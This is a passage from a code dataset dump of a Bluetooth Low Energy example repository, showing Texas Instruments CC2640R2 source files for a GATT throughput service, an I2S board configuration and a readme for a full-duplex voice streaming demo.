INCLUDES\n */\n\n/*********************************************************************\n * CONSTANTS\n */\n\n/*********************************************************************\n* CONSTANTS\n*/\n// Service UUID\n#define THROUGHPUT_SERVICE_SERV_UUID 0x1234\n\n// Characteristic defines\n#define THROUGHPUT_SERVICE_UPDATE_PDU 0\n#define THROUGHPUT_SERVICE_UPDATE_PDU_UUID 0x1235\n#define THROUGHPUT_SERVICE_UPDATE_PDU_LEN 1\n\n// Characteristic defines\n#define THROUGHPUT_SERVICE_UPDATE_PHY 1\n#define THROUGHPUT_SERVICE_UPDATE_PHY_UUID 0x1236\n#define THROUGHPUT_SERVICE_UPDATE_PHY_LEN 1\n\n// Characteristic defines\n#define THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT 2\n#define THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_UUID 0x1237\n#define THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_LEN 1\n\n/*********************************************************************\n * TYPEDEFS\n */\n\n/*********************************************************************\n * MACROS\n */\n\n/*********************************************************************\n * Profile Callbacks\n */\n\n// Callback when a characteristic value has changed\ntypedef void (*Throughput_ServiceChange_t)( uint8 paramID );\n\ntypedef struct\n{\n Throughput_ServiceChange_t pfnChangeCb; // Called when characteristic value changes\n} Throughput_ServiceCBs_t;\n\n\n\n/*********************************************************************\n * API FUNCTIONS\n */\n\n\n/*\n * Throughput_Service_AddService- Initializes the Throughput_Service service by registering\n * GATT attributes with the GATT server.\n *\n */\nextern bStatus_t Throughput_Service_AddService( void );\n\n/*\n * Throughput_Service_RegisterAppCBs - Registers the application callback function.\n * Only call this function once.\n *\n * appCallbacks - pointer to application callbacks.\n */\nextern bStatus_t Throughput_Service_RegisterAppCBs( Throughput_ServiceCBs_t *appCallbacks );\n\n/*\n * Throughput_Service_SetParameter - Set a Throughput_Service parameter.\n *\n * param - Profile parameter ID\n * len - length of data to right\n * value - pointer to data to write. This is dependent on\n * the parameter ID and WILL be cast to the appropriate\n * data type (example: data type of uint16 will be cast to\n * uint16 pointer).\n */\nextern bStatus_t Throughput_Service_SetParameter( uint8 param, uint8 len, void *value );\n\n/*\n * Throughput_Service_GetParameter - Get a Throughput_Service parameter.\n *\n * param - Profile parameter ID\n * value - pointer to data to write. This is dependent on\n * the parameter ID and WILL be cast to the appropriate\n * data type (example: data type of uint16 will be cast to\n * uint16 pointer).\n */\nextern bStatus_t Throughput_Service_GetParameter( uint8 param, void *value );\n\n/*********************************************************************\n*********************************************************************/\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* _THROUGHPUT_SERVICE_H_ */\n"
},
{
"alpha_fraction": 0.6518004536628723,
"alphanum_fraction": 0.6878097057342529,
"avg_line_length": 38.31168746948242,
"blob_id": "995f00e32f499a37e2285f59d23fd6ba8bc60f8e",
"content_id": "c1b7ec51309d28584c8e41684a1b50fe20e7f186",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 3027,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 77,
"path": "/source/ti/boards/CC2640R2_LAUNCHXL_I2S/CC2640R2_LAUNCHXL_I2S.c",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (c) 2016, Texas Instruments Incorporated\n * All rights reserved.\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the distribution.\n *\n * * Neither the name of Texas Instruments Incorporated nor the names of\n * its contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n * THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n */\n\n/*\n * ====================== CC2640R2_LAUNCHXL_I2S.c ===========================\n * This board file is an addendum to CC2640R2_LAUNCHXL.c. It adds an I2S\n * object to interface the CC2640R2F and a booster pack.\n * ============================================================================\n */\n\n#include <xdc/std.h>\n#include <xdc/runtime/System.h>\n#include <ti/sysbios/family/arm/m3/Hwi.h>\n\n#include \"CC2640R2_LAUNCHXL_I2S.h\"\n/*\n *============================= I2S begin =====================================\n */\n/* Place into subsections to allow the TI linker to remove items properly */\n#if defined(__TI_COMPILER_VERSION__)\n#pragma DATA_SECTION(I2SCC26XX_config, \".const:I2SCC26XX_config\")\n#pragma DATA_SECTION(i2sCC26XXHWAttrs, \".const:i2sCC26XXHWAttrs\")\n#endif\n\n#include <ti/drivers/i2s/I2SCC26XX.h>\n\nI2SCC26XX_Object i2sCC26XXObject;\n\nconst I2SCC26XX_HWAttrs i2sCC26XXHWAttrs = {\n .baseAddr = I2S0_BASE,\n .intNum = INT_I2S_IRQ,\n .intPriority = ~0,\n .powerMngrId = PowerCC26XX_PERIPH_I2S,\n .mclkPin = CC2640R2_LAUNCHXL_I2S_MCLK,\n .bclkPin = CC2640R2_LAUNCHXL_I2S_BCLK,\n .wclkPin = CC2640R2_LAUNCHXL_I2S_WCLK,\n .ad0Pin = CC2640R2_LAUNCHXL_I2S_ADO,\n .ad1Pin = CC2640R2_LAUNCHXL_I2S_ADI,\n};\n\n/* I2S configuration structure */\nconst I2SCC26XX_Config I2SCC26XX_config[] = {\n {\n .object = &i2sCC26XXObject,\n .hwAttrs = &i2sCC26XXHWAttrs\n },\n {NULL, NULL}\n};\n"
},
{
"alpha_fraction": 0.6159595251083374,
"alphanum_fraction": 0.6215646266937256,
"avg_line_length": 32.38430404663086,
"blob_id": "06dad6134b3f6be635ca69b99a8032cc8b7c967f",
"content_id": "33ea8a5f8885ee4381c2669ed18adc06634e5ae8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 16592,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 497,
"path": "/source/ti/ble5stack/profiles/throughput/throughput_service.c",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/**********************************************************************************************\n * Filename: Throughput_Service.c\n *\n * Description: This file contains the implementation of the service.\n *\n * Copyright (c) 2015-2017, Texas Instruments Incorporated\n * All rights reserved.\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the distribution.\n *\n * * Neither the name of Texas Instruments Incorporated nor the names of\n * its contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n * THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n *\n *************************************************************************************************/\n\n\n/*********************************************************************\n * INCLUDES\n */\n#include <string.h>\n\n#include \"bcomdef.h\"\n#include \"OSAL.h\"\n#include \"linkdb.h\"\n#include \"att.h\"\n#include \"gatt.h\"\n#include \"gatt_uuid.h\"\n#include \"gattservapp.h\"\n#include \"gapbondmgr.h\"\n\n#include \"Throughput_Service.h\"\n\n/*********************************************************************\n * MACROS\n */\n\n/*********************************************************************\n * CONSTANTS\n */\n\n/*********************************************************************\n * TYPEDEFS\n */\n\n/*********************************************************************\n* GLOBAL VARIABLES\n*/\n\n// Throughput_Service Service UUID\nCONST uint8_t Throughput_ServiceUUID[ATT_UUID_SIZE] =\n{\n TI_BASE_UUID_128(THROUGHPUT_SERVICE_SERV_UUID)\n};\n\n// Update_PDU UUID\nCONST uint8_t Throughput_Service_Update_PDUUUID[ATT_UUID_SIZE] =\n{\n TI_BASE_UUID_128(THROUGHPUT_SERVICE_UPDATE_PDU_UUID)\n};\n// Update_PHY UUID\nCONST uint8_t Throughput_Service_Update_PHYUUID[ATT_UUID_SIZE] =\n{\n TI_BASE_UUID_128(THROUGHPUT_SERVICE_UPDATE_PHY_UUID)\n};\n// Toggle_Throughput UUID\nCONST uint8_t Throughput_Service_Toggle_ThroughputUUID[ATT_UUID_SIZE] =\n{\n TI_BASE_UUID_128(THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_UUID)\n};\n\n/*********************************************************************\n * LOCAL VARIABLES\n */\n\nstatic Throughput_ServiceCBs_t *pAppCBs = NULL;\n\n/*********************************************************************\n* Profile Attributes - variables\n*/\n\n// Service declaration\nstatic CONST gattAttrType_t Throughput_ServiceDecl = { ATT_UUID_SIZE, Throughput_ServiceUUID };\n\n// Characteristic \"Update_PDU\" Properties (for declaration)\nstatic uint8_t Throughput_Service_Update_PDUProps = GATT_PROP_READ | GATT_PROP_WRITE;\n\n// Characteristic \"Update_PDU\" Value variable\nstatic uint8_t Throughput_Service_Update_PDUVal[THROUGHPUT_SERVICE_UPDATE_PDU_LEN] = {0};\n// Characteristic \"Update_PHY\" Properties (for declaration)\nstatic uint8_t Throughput_Service_Update_PHYProps = GATT_PROP_READ | GATT_PROP_WRITE;\n\n// Characteristic \"Update_PHY\" Value variable\nstatic uint8_t Throughput_Service_Update_PHYVal[THROUGHPUT_SERVICE_UPDATE_PHY_LEN] = {0};\n// Characteristic \"Toggle_Throughput\" Properties (for declaration)\nstatic uint8_t Throughput_Service_Toggle_ThroughputProps = GATT_PROP_READ | GATT_PROP_WRITE;\n\n// Characteristic \"Toggle_Throughput\" Value variable\nstatic uint8_t Throughput_Service_Toggle_ThroughputVal[THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_LEN] = {0};\n\n/*********************************************************************\n* Profile Attributes - Table\n*/\n\nstatic gattAttribute_t Throughput_ServiceAttrTbl[] =\n{\n // Throughput_Service Service Declaration\n {\n { ATT_BT_UUID_SIZE, primaryServiceUUID },\n GATT_PERMIT_READ,\n 0,\n (uint8_t *)&Throughput_ServiceDecl\n },\n // Update_PDU Characteristic Declaration\n {\n { ATT_BT_UUID_SIZE, characterUUID },\n GATT_PERMIT_READ,\n 0,\n &Throughput_Service_Update_PDUProps\n },\n // Update_PDU Characteristic Value\n {\n { ATT_UUID_SIZE, Throughput_Service_Update_PDUUUID },\n GATT_PERMIT_READ | GATT_PERMIT_WRITE,\n 0,\n Throughput_Service_Update_PDUVal\n },\n // Update_PHY Characteristic Declaration\n {\n { ATT_BT_UUID_SIZE, characterUUID },\n GATT_PERMIT_READ,\n 0,\n &Throughput_Service_Update_PHYProps\n },\n // Update_PHY Characteristic Value\n {\n { ATT_UUID_SIZE, Throughput_Service_Update_PHYUUID },\n GATT_PERMIT_READ | GATT_PERMIT_WRITE,\n 0,\n Throughput_Service_Update_PHYVal\n },\n // Toggle_Throughput Characteristic Declaration\n {\n { ATT_BT_UUID_SIZE, characterUUID },\n GATT_PERMIT_READ,\n 0,\n &Throughput_Service_Toggle_ThroughputProps\n },\n // Toggle_Throughput Characteristic Value\n {\n { ATT_UUID_SIZE, Throughput_Service_Toggle_ThroughputUUID },\n GATT_PERMIT_READ | GATT_PERMIT_WRITE,\n 0,\n Throughput_Service_Toggle_ThroughputVal\n },\n};\n\n/*********************************************************************\n * LOCAL FUNCTIONS\n */\nstatic bStatus_t Throughput_Service_ReadAttrCB( uint16 connHandle, gattAttribute_t *pAttr,\n uint8 *pValue, uint16 *pLen, uint16 offset,\n uint16 maxLen, uint8 method );\nstatic bStatus_t Throughput_Service_WriteAttrCB( uint16 connHandle, gattAttribute_t *pAttr,\n uint8 *pValue, uint16 len, uint16 offset,\n uint8 method );\n\n/*********************************************************************\n * PROFILE CALLBACKS\n */\n// Simple Profile Service Callbacks\nCONST gattServiceCBs_t Throughput_ServiceCBs =\n{\n Throughput_Service_ReadAttrCB, // Read callback function pointer\n Throughput_Service_WriteAttrCB, // Write callback function pointer\n NULL // Authorization callback function pointer\n};\n\n/*********************************************************************\n* PUBLIC FUNCTIONS\n*/\n\n/*\n * Throughput_Service_AddService- Initializes the Throughput_Service service by registering\n * GATT attributes with the GATT server.\n *\n */\nbStatus_t Throughput_Service_AddService( void )\n{\n uint8_t status;\n\n // Register GATT attribute list and CBs with GATT Server App\n status = GATTServApp_RegisterService( Throughput_ServiceAttrTbl,\n GATT_NUM_ATTRS( Throughput_ServiceAttrTbl ),\n GATT_MAX_ENCRYPT_KEY_SIZE,\n &Throughput_ServiceCBs );\n\n return ( status );\n}\n\n/*\n * Throughput_Service_RegisterAppCBs - Registers the application callback function.\n * Only call this function once.\n *\n * appCallbacks - pointer to application callbacks.\n */\nbStatus_t Throughput_Service_RegisterAppCBs( Throughput_ServiceCBs_t *appCallbacks )\n{\n if ( appCallbacks )\n {\n pAppCBs = appCallbacks;\n\n return ( SUCCESS );\n }\n else\n {\n return ( bleAlreadyInRequestedMode );\n }\n}\n\n/*\n * Throughput_Service_SetParameter - Set a Throughput_Service parameter.\n *\n * param - Profile parameter ID\n * len - length of data to right\n * value - pointer to data to write. This is dependent on\n * the parameter ID and WILL be cast to the appropriate\n * data type (example: data type of uint16 will be cast to\n * uint16 pointer).\n */\nbStatus_t Throughput_Service_SetParameter( uint8 param, uint8 len, void *value )\n{\n bStatus_t ret = SUCCESS;\n switch ( param )\n {\n case THROUGHPUT_SERVICE_UPDATE_PDU:\n if ( len == THROUGHPUT_SERVICE_UPDATE_PDU_LEN )\n {\n memcpy(Throughput_Service_Update_PDUVal, value, len);\n }\n else\n {\n ret = bleInvalidRange;\n }\n break;\n\n case THROUGHPUT_SERVICE_UPDATE_PHY:\n if ( len == THROUGHPUT_SERVICE_UPDATE_PHY_LEN )\n {\n memcpy(Throughput_Service_Update_PHYVal, value, len);\n }\n else\n {\n ret = bleInvalidRange;\n }\n break;\n\n case THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT:\n if ( len == THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_LEN )\n {\n memcpy(Throughput_Service_Toggle_ThroughputVal, value, len);\n }\n else\n {\n ret = bleInvalidRange;\n }\n break;\n\n default:\n ret = INVALIDPARAMETER;\n break;\n }\n return ret;\n}\n\n\n/*\n * Throughput_Service_GetParameter - Get a Throughput_Service parameter.\n *\n * param - Profile parameter ID\n * value - pointer to data to write. This is dependent on\n * the parameter ID and WILL be cast to the appropriate\n * data type (example: data type of uint16 will be cast to\n * uint16 pointer).\n */\nbStatus_t Throughput_Service_GetParameter( uint8 param, void *value )\n{\n bStatus_t ret = SUCCESS;\n switch ( param )\n {\n case THROUGHPUT_SERVICE_UPDATE_PDU:\n memcpy(value, Throughput_Service_Update_PDUVal, THROUGHPUT_SERVICE_UPDATE_PDU_LEN);\n break;\n\n case THROUGHPUT_SERVICE_UPDATE_PHY:\n memcpy(value, Throughput_Service_Update_PHYVal, THROUGHPUT_SERVICE_UPDATE_PHY_LEN);\n break;\n\n case THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT:\n memcpy(value, Throughput_Service_Toggle_ThroughputVal, THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_LEN);\n break;\n\n default:\n ret = INVALIDPARAMETER;\n break;\n }\n return ret;\n}\n\n\n/*********************************************************************\n * @fn Throughput_Service_ReadAttrCB\n *\n * @brief Read an attribute.\n *\n * @param connHandle - connection message was received on\n * @param pAttr - pointer to attribute\n * @param pValue - pointer to data to be read\n * @param pLen - length of data to be read\n * @param offset - offset of the first octet to be read\n * @param maxLen - maximum length of data to be read\n * @param method - type of read message\n *\n * @return SUCCESS, blePending or Failure\n */\nstatic bStatus_t Throughput_Service_ReadAttrCB( uint16 connHandle, gattAttribute_t *pAttr,\n uint8 *pValue, uint16 *pLen, uint16 offset,\n uint16 maxLen, uint8 method )\n{\n bStatus_t status = SUCCESS;\n\n // See if request is regarding the Update_PDU Characteristic Value\nif ( ! memcmp(pAttr->type.uuid, Throughput_Service_Update_PDUUUID, pAttr->type.len) )\n {\n if ( offset > THROUGHPUT_SERVICE_UPDATE_PDU_LEN ) // Prevent malicious ATT ReadBlob offsets.\n {\n status = ATT_ERR_INVALID_OFFSET;\n }\n else\n {\n *pLen = MIN(maxLen, THROUGHPUT_SERVICE_UPDATE_PDU_LEN - offset); // Transmit as much as possible\n memcpy(pValue, pAttr->pValue + offset, *pLen);\n }\n }\n // See if request is regarding the Update_PHY Characteristic Value\nelse if ( ! memcmp(pAttr->type.uuid, Throughput_Service_Update_PHYUUID, pAttr->type.len) )\n {\n if ( offset > THROUGHPUT_SERVICE_UPDATE_PHY_LEN ) // Prevent malicious ATT ReadBlob offsets.\n {\n status = ATT_ERR_INVALID_OFFSET;\n }\n else\n {\n *pLen = MIN(maxLen, THROUGHPUT_SERVICE_UPDATE_PHY_LEN - offset); // Transmit as much as possible\n memcpy(pValue, pAttr->pValue + offset, *pLen);\n }\n }\n // See if request is regarding the Toggle_Throughput Characteristic Value\nelse if ( ! memcmp(pAttr->type.uuid, Throughput_Service_Toggle_ThroughputUUID, pAttr->type.len) )\n {\n if ( offset > THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_LEN ) // Prevent malicious ATT ReadBlob offsets.\n {\n status = ATT_ERR_INVALID_OFFSET;\n }\n else\n {\n *pLen = MIN(maxLen, THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_LEN - offset); // Transmit as much as possible\n memcpy(pValue, pAttr->pValue + offset, *pLen);\n }\n }\n else\n {\n // If we get here, that means you've forgotten to add an if clause for a\n // characteristic value attribute in the attribute table that has READ permissions.\n *pLen = 0;\n status = ATT_ERR_ATTR_NOT_FOUND;\n }\n\n return status;\n}\n\n\n/*********************************************************************\n * @fn Throughput_Service_WriteAttrCB\n *\n * @brief Validate attribute data prior to a write operation\n *\n * @param connHandle - connection message was received on\n * @param pAttr - pointer to attribute\n * @param pValue - pointer to data to be written\n * @param len - length of data\n * @param offset - offset of the first octet to be written\n * @param method - type of write message\n *\n * @return SUCCESS, blePending or Failure\n */\nstatic bStatus_t Throughput_Service_WriteAttrCB( uint16 connHandle, gattAttribute_t *pAttr,\n uint8 *pValue, uint16 len, uint16 offset,\n uint8 method )\n{\n bStatus_t status = SUCCESS;\n uint8_t paramID = 0xFF;\n\n // See if request is regarding a Client Characterisic Configuration\n if ( ! memcmp(pAttr->type.uuid, clientCharCfgUUID, pAttr->type.len) )\n {\n // Allow only notifications.\n status = GATTServApp_ProcessCCCWriteReq( connHandle, pAttr, pValue, len,\n offset, GATT_CLIENT_CFG_NOTIFY);\n }\n // See if request is regarding the Update_PDU Characteristic Value\n else if ( ! memcmp(pAttr->type.uuid, Throughput_Service_Update_PDUUUID, pAttr->type.len) )\n {\n if ( offset + len > THROUGHPUT_SERVICE_UPDATE_PDU_LEN )\n {\n status = ATT_ERR_INVALID_OFFSET;\n }\n else\n {\n // Copy pValue into the variable we point to from the attribute table.\n memcpy(pAttr->pValue + offset, pValue, len);\n\n // Only notify application if entire expected value is written\n if ( offset + len == THROUGHPUT_SERVICE_UPDATE_PDU_LEN)\n paramID = THROUGHPUT_SERVICE_UPDATE_PDU;\n }\n }\n // See if request is regarding the Update_PHY Characteristic Value\n else if ( ! memcmp(pAttr->type.uuid, Throughput_Service_Update_PHYUUID, pAttr->type.len) )\n {\n if ( offset + len > THROUGHPUT_SERVICE_UPDATE_PHY_LEN )\n {\n status = ATT_ERR_INVALID_OFFSET;\n }\n else\n {\n // Copy pValue into the variable we point to from the attribute table.\n memcpy(pAttr->pValue + offset, pValue, len);\n\n // Only notify application if entire expected value is written\n if ( offset + len == THROUGHPUT_SERVICE_UPDATE_PHY_LEN)\n paramID = THROUGHPUT_SERVICE_UPDATE_PHY;\n }\n }\n // See if request is regarding the Toggle_Throughput Characteristic Value\n else if ( ! memcmp(pAttr->type.uuid, Throughput_Service_Toggle_ThroughputUUID, pAttr->type.len) )\n {\n if ( offset + len > THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_LEN )\n {\n status = ATT_ERR_INVALID_OFFSET;\n }\n else\n {\n // Copy pValue into the variable we point to from the attribute table.\n memcpy(pAttr->pValue + offset, pValue, len);\n\n // Only notify application if entire expected value is written\n if ( offset + len == THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_LEN)\n paramID = THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT;\n }\n }\n else\n {\n // If we get here, that means you've forgotten to add an if clause for a\n // characteristic value attribute in the attribute table that has WRITE permissions.\n status = ATT_ERR_ATTR_NOT_FOUND;\n }\n\n // Let the application know something changed (if it did) by using the\n // callback it registered earlier (if it did).\n if (paramID != 0xFF)\n if ( pAppCBs && pAppCBs->pfnChangeCb )\n pAppCBs->pfnChangeCb( paramID ); // Call app function from stack task context.\n\n return status;\n}\n"
},
{
"alpha_fraction": 0.7211760878562927,
"alphanum_fraction": 0.7398414015769958,
"avg_line_length": 32.263736724853516,
"blob_id": "d1ab2e0279d3c80294a2bf81b904826fd767bf5b",
"content_id": "2d297fdc654581d258d9684280723b8d7d3393da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6054,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 182,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/bleapps/simple_central_bidirectional_audio/readme.md",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "Purpose / Scope\n===============\n\nThis page will document how to demonstrate an end to end full duplex BLE\nvoice/audio solution using two CC26xx devices.\nEmphasis will be placed on the central device which is responsible for\nestablishing the connection.\n\nVoice data is transferred over BLE using the TI audio\\_profile\\_dle which is a\nVoice Over GATT Profile (VoGP) design. This profile has been augmented to use\ndata length extension and large MTU.\n\nThe TI audio\\_profile\\_dle has been updated to add an additional start byte.\nThis new start byte indicates that the following stream uses mSBC compression.\n\nIn this demo, data flows bidirectionally between a streamer (GATT server) and a\nreceiver (GATT client) device. This means both devices must act as both a GATT\nclient and a GATT server.\n\nThe `simple_central_bidirectional_audio` project is a modified version of\n`simple_central` from the BLE-SDK.\n\nThe central project was slightly modified to:\n\n - Automatically connect to the audio peripheral based on the peripheral's\n advertisement data.\n - Transmit and receive voice streams using the TI VoGP audio\\_profile\\_dle\n - Encode a voice stream from a microphone on the CC3200AUDBOOST.\n - Decode a voice stream and output to headphone/line out on CC3200AUDBOOST.\n - Stream audio data with IMA-ADPCM or mSBC codec using the Data Length\n Extension feature\n\nStreaming Voice over BLE\n========================\n\nFor more information about the technical details of TI's *Voice Over BLE* Solution\nplease see the Software Developer's Guide. Note that the audio profile used in\nthis example is slightly modified to use Data Length extension and large MTU.\n[BLE-Stack User's Guide, see Voice Section](http://software-dl.ti.com/lprf/blestack-latest/).\n\nSome quick facts about voice over BLE:\n\n - `CC3200AUDBOOST BoosterPack`\n - Sample rate: `16kHz`\n - Bit Depth: `16 bits`\n - Compression mechanism: `4:1 IMA-ADPCM` or `mSBC`\n - Required application throughput: `66.67kbps` or `60.8kpbs`\n - Voice quality (IMA-ADPCM) has been qualified by Nuance and is sufficient for\n voice recognition solutions\n\n_Note: The files in source/ti/audiocodec are used as the control interface to\nthe TLV320AIC3254 on the CC3200AUDBOOST. The software codecs responsible for\ncompression and decompression are found in the following locations:_\n - MSBC: source/third_party/sbc (of this repo)\n - ADPCM: source/ti/drivers/pdm (of the SDK install)\n\nRuntime Buffer Management\n=========================\n\nDuring normal operation the instruction cache is enabled.\n\nWhen bidirectional streaming begins, the cache is disabled and is temporarily used\nas RAM for I2S buffers. Once the stream stops, the instruction cache is re-enabled.\n\nThis offers significant power consumption improvements over a `CACHE_AS_RAM`\nconfiguration.\n\nUpon a disconnect, the `osal_snv` module within the stack will trigger a\ncompaction if necessary. The `OSAL_SNV=1` (one page SNV) will use the cache for\nthis. In order to prevent potential memory corruption during compaction and the\ncleanup of an I2S stream, **the OSAL_SNV=2 or OSAL_SNV=0 configurations are\nrecommended**\n\nPrerequisites\n=============\n\n#### Hardware Requirements\n\nBefore running the demo, the user will need the following components:\n\n- Two voice enabled development kits: CC2640R2 LaunchPad with CC3200AUDBOOST\n - [CC2640R2 LaunchPad](http://www.ti.com/tool/launchxl-cc2640r2)\n - [CC3200AUDBOOST](http://www.ti.com/tool/cc3200audboost)\n- Two sets of headphones\n\n_Note: Apple headphones will not work with the CC3200 BoosterPack_\n\n#### Firmware Requirements\n\n1. Load the peripheral device with the `simple_peripheral_bidirectional_audio`\n project\n1. Load the central device with the `simple_central_bidirectional_audio`\n project\n\n\nRunning the Demo\n================\n\n#### Hardware Setup\n\n - Seat the `CC3200AUDBOOST` on the `CC2640R2_LAUNCHXL` as shown in the photo\n below\n - Attach a compatible set of headphones to the `LINE OUT` connector on the\n `CC3200AUDBOOST`\n\n\n\n#### Full Duplex Bidirectional Voice Streaming on the CC2640R2\n\nAfter building the firmware required for the central and peripheral, you are\nready to demo the voice capabilities of the CC2640R2.\n\n1. Power up the peripheral launchpad\n * If the serial port is attached it will log\n ```\n Audio Tx Peripheral with DLE\n <BD_ADDR>\n Initialized\n Advertising\n ```\n\n2. Power up the central device\n * If the serial port is attached it will log\n ```\n Audio Central with DLE\n <BD_ADDR>\n Initialized\n Idle...\n\n ```\n3. Start Discovery on the central device by pressing the left key on the LaunchPad.\n * The Central device will scan the peripheral's advertisement data for the\n AUDIO\\_SERV\\_UUID (Audio Profile).\n * After finding devices that list these services, their advertisement payloads\n will be scanned for the device name:\n\n ```c\n static uint8 remoteNameTx[] =\n {\n 'S', 'i', 'm', 'p', 'l', 'e',\n 'B', 'L', 'E',\n 'A', 'u', 'd', 'i', 'o', 'T', 'x',\n };\n ```\n4. If an acceptable voice streaming device is found (CC2640R2LP with the correct\n name and audio profile), the central will connect to the device.\n If attached, the serial port will log:\n\n * Audio Central\n ```\n Audio Central with DLE\n <BD_ADDR>\n Initialized\n Idle...\n Discovering...\n Connected\n <PEER_BD_ADDR>\n MTU_EXCHANGE_RSP 103\n ```\n * Audio Peripheral\n ```\n Connected\n <PEER_BD_ADDR>\n ```\n5. The devices are now ready to stream voice over BLE.\n * Press the right button on the peripheral device to start streaming with\n ADPCM compression.\n * Press the left button on the peripheral device to start streaming with mSBC\n compression\n\nDemo LED states\n===============\n\nThe following states of the device can be described by the red and green LEDs\non the LaunchPad.\n* Idle + bonds forgotten: Red LED is on, solid\n* Scanning for devices: Green LED is flashing\n* Device connected: Green LED is on, solid\n\nReferences\n==========\n * [BLE-Stack User's Guide, see Voice Section](http://software-dl.ti.com/lprf/blestack-latest/)\n"
},
{
"alpha_fraction": 0.7542765140533447,
"alphanum_fraction": 0.7644395232200623,
"avg_line_length": 40.06611633300781,
"blob_id": "6baffb7524b9a3bad4a5c7a75d2aeefb4f0051fa",
"content_id": "6e69542f56008590fb319f3d7a869dd439f10931",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 9938,
"license_type": "no_license",
"max_line_length": 219,
"num_lines": 242,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/bleapps/ancs/readme.md",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
